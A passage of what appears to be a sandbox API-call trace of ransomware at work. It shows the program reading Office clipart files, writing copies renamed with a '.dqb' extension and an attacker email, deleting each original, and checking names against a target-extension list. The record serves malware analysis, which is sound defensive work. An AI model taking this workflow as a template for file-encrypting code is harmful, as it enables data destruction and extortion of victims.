Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 63 [0053.528] lstrlenW (lpString=".1cd") returned 4 [0053.528] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 63 [0053.528] lstrlenW (lpString=".jpg") returned 4 [0053.528] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.529] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.529] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.529] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06200_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0053.529] GetLastError () returned 0x0 [0053.529] ReadFile (in: hFile=0x17c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x4124, lpOverlapped=0x0) returned 1 [0053.531] WriteFile (in: hFile=0x230, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x4130, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x4130, lpOverlapped=0x0) returned 1 [0053.532] ReadFile (in: hFile=0x17c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.532] WriteFile (in: hFile=0x230, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.532] SetEndOfFile (hFile=0x230) returned 1 [0053.532] CloseHandle (hObject=0x230) returned 1 [0053.533] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.533] SetEndOfFile (hFile=0x17c) returned 1 [0053.533] CloseHandle (hObject=0x17c) returned 1 [0053.533] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.534] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06200_.wmf")) returned 1 [0053.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63 [0053.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63 [0053.534] lstrlenW (lpString=".doc") returned 4 [0053.534] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.534] lstrlenW (lpString=".docx") returned 5 [0053.534] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.534] lstrlenW (lpString=".pdf") returned 4 [0053.534] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.534] lstrlenW (lpString=".xls") returned 4 [0053.534] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.534] lstrlenW (lpString=".xlsx") returned 5 [0053.534] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.534] lstrlenW (lpString=".ppt") returned 4 [0053.534] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63 [0053.534] lstrlenW (lpString=".zip") returned 4 [0053.534] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.534] lstrlenW (lpString=".rar") returned 4 [0053.534] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.534] lstrlenW (lpString=".bz2") returned 4 [0053.534] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.535] lstrlenW (lpString=".7z") returned 3 [0053.535] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63 [0053.535] lstrlenW (lpString=".dbf") returned 4 [0053.535] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63 [0053.535] lstrlenW (lpString=".1cd") returned 4 [0053.535] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63 [0053.535] lstrlenW (lpString=".jpg") returned 4 [0053.535] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.535] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=26748) returned 1 [0053.535] CloseHandle (hObject=0x17c) returned 1 [0053.535] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf")) returned 0x20 [0053.535] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.535] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0053.535] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.535] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0053.536] GetLastError () returned 0x0 [0053.536] ReadFile (in: hFile=0x17c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x687c, lpOverlapped=0x0) returned 1 [0053.537] WriteFile (in: hFile=0x230, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x6880, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x6880, lpOverlapped=0x0) returned 1 [0053.539] ReadFile (in: hFile=0x17c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.539] WriteFile (in: hFile=0x230, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.539] SetEndOfFile (hFile=0x230) returned 1 [0053.539] CloseHandle (hObject=0x230) returned 1 [0053.539] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.539] SetEndOfFile (hFile=0x17c) returned 1 [0053.540] CloseHandle (hObject=0x17c) returned 1 [0053.540] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.540] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf")) returned 1 [0053.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63 [0053.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63 [0053.540] lstrlenW (lpString=".doc") returned 4 [0053.540] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.540] lstrlenW (lpString=".docx") returned 5 [0053.540] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.540] lstrlenW (lpString=".pdf") returned 4 [0053.540] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.540] lstrlenW (lpString=".xls") returned 4 [0053.541] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.541] lstrlenW (lpString=".xlsx") returned 5 [0053.541] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.541] lstrlenW (lpString=".ppt") returned 4 [0053.541] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63 [0053.541] lstrlenW (lpString=".zip") returned 4 [0053.541] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.541] lstrlenW (lpString=".rar") returned 4 [0053.541] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.541] lstrlenW (lpString=".bz2") returned 4 [0053.541] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.541] lstrlenW (lpString=".7z") returned 3 [0053.541] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63 [0053.541] lstrlenW (lpString=".dbf") returned 4 [0053.541] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63 [0053.541] lstrlenW (lpString=".1cd") returned 4 [0053.541] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63 [0053.541] lstrlenW (lpString=".jpg") returned 4 [0053.541] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.541] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.541] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07804_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0053.542] GetLastError () returned 0x0 [0053.542] ReadFile (in: hFile=0x17c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x133c, lpOverlapped=0x0) returned 1 [0053.543] WriteFile (in: hFile=0x230, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x1340, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x1340, lpOverlapped=0x0) returned 1 [0053.544] ReadFile (in: hFile=0x17c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.544] WriteFile (in: hFile=0x230, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.544] SetEndOfFile (hFile=0x230) returned 1 [0053.544] CloseHandle (hObject=0x230) returned 1 [0053.545] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.545] SetEndOfFile (hFile=0x17c) returned 1 [0053.545] CloseHandle (hObject=0x17c) returned 1 [0053.545] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.546] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07804_.wmf")) returned 1 [0053.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63 [0053.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63 [0053.546] lstrlenW (lpString=".doc") returned 4 [0053.546] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.546] lstrlenW (lpString=".docx") returned 5 [0053.546] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.546] lstrlenW (lpString=".pdf") returned 4 [0053.546] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.546] lstrlenW (lpString=".xls") returned 4 [0053.546] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.546] lstrlenW (lpString=".xlsx") returned 5 [0053.546] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.546] lstrlenW (lpString=".ppt") returned 4 [0053.546] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63 [0053.546] lstrlenW (lpString=".zip") returned 4 [0053.546] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.546] lstrlenW (lpString=".rar") returned 4 [0053.546] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.546] lstrlenW (lpString=".bz2") returned 4 [0053.546] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.546] lstrlenW (lpString=".7z") returned 3 [0053.546] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63 [0053.546] lstrlenW (lpString=".dbf") returned 4 [0053.546] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63 [0053.547] lstrlenW (lpString=".1cd") returned 4 [0053.547] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63 [0053.547] lstrlenW (lpString=".jpg") returned 4 [0053.547] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.573] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.586] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.586] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0053.587] GetLastError () returned 0x0 [0053.587] ReadFile (in: hFile=0x230, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0xfe2, lpOverlapped=0x0) returned 1 [0053.588] WriteFile (in: hFile=0x208, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xff0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xff0, lpOverlapped=0x0) returned 1 [0053.589] ReadFile (in: hFile=0x230, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.589] WriteFile (in: hFile=0x208, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.590] SetEndOfFile (hFile=0x208) returned 1 [0053.590] CloseHandle (hObject=0x208) returned 1 [0053.590] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.590] SetEndOfFile (hFile=0x230) returned 1 [0053.591] CloseHandle (hObject=0x230) returned 1 [0053.591] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.591] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf")) returned 1 [0053.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63 [0053.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63 [0053.591] lstrlenW (lpString=".doc") returned 4 [0053.591] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.591] lstrlenW (lpString=".docx") returned 5 [0053.591] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.591] lstrlenW (lpString=".pdf") returned 4 [0053.591] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.591] lstrlenW (lpString=".xls") returned 4 [0053.591] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.593] lstrlenW (lpString=".xlsx") returned 5 [0053.593] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.593] lstrlenW (lpString=".ppt") returned 4 [0053.593] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63 [0053.593] lstrlenW (lpString=".zip") returned 4 [0053.593] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.593] lstrlenW (lpString=".rar") returned 4 [0053.593] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.593] lstrlenW (lpString=".bz2") returned 4 [0053.593] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.593] lstrlenW (lpString=".7z") returned 3 [0053.593] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63 [0053.593] lstrlenW (lpString=".dbf") returned 4 [0053.593] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63 [0053.593] lstrlenW (lpString=".1cd") returned 4 [0053.593] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63 [0053.593] lstrlenW (lpString=".jpg") returned 4 [0053.593] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.594] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.594] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.594] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09194_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0053.594] GetLastError () returned 0x0 [0053.594] ReadFile (in: hFile=0x230, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x38cc, lpOverlapped=0x0) returned 1 [0053.596] WriteFile (in: hFile=0x208, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x38d0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x38d0, lpOverlapped=0x0) returned 1 [0053.597] ReadFile (in: hFile=0x230, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.597] WriteFile (in: hFile=0x208, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.597] SetEndOfFile (hFile=0x208) returned 1 [0053.597] CloseHandle (hObject=0x208) returned 1 [0053.597] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.597] SetEndOfFile (hFile=0x230) returned 1 [0053.598] CloseHandle (hObject=0x230) returned 1 [0053.598] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.598] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09194_.wmf")) returned 1 [0053.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63 [0053.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63 [0053.598] lstrlenW (lpString=".doc") returned 4 [0053.598] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.598] lstrlenW (lpString=".docx") returned 5 [0053.598] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.598] lstrlenW (lpString=".pdf") returned 4 [0053.599] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.599] lstrlenW (lpString=".xls") returned 4 [0053.599] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.599] lstrlenW (lpString=".xlsx") returned 5 [0053.599] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.599] lstrlenW (lpString=".ppt") returned 4 [0053.599] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63 [0053.599] lstrlenW (lpString=".zip") returned 4 [0053.599] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.599] lstrlenW (lpString=".rar") returned 4 [0053.599] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.599] lstrlenW (lpString=".bz2") returned 4 [0053.599] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.599] lstrlenW (lpString=".7z") returned 3 [0053.599] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63 [0053.599] lstrlenW (lpString=".dbf") returned 4 [0053.599] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63 [0053.599] lstrlenW (lpString=".1cd") returned 4 [0053.599] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63 [0053.599] lstrlenW (lpString=".jpg") returned 4 [0053.599] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.599] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.599] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.600] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09662_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0053.600] GetLastError () returned 0x0 [0053.600] ReadFile (in: hFile=0x230, 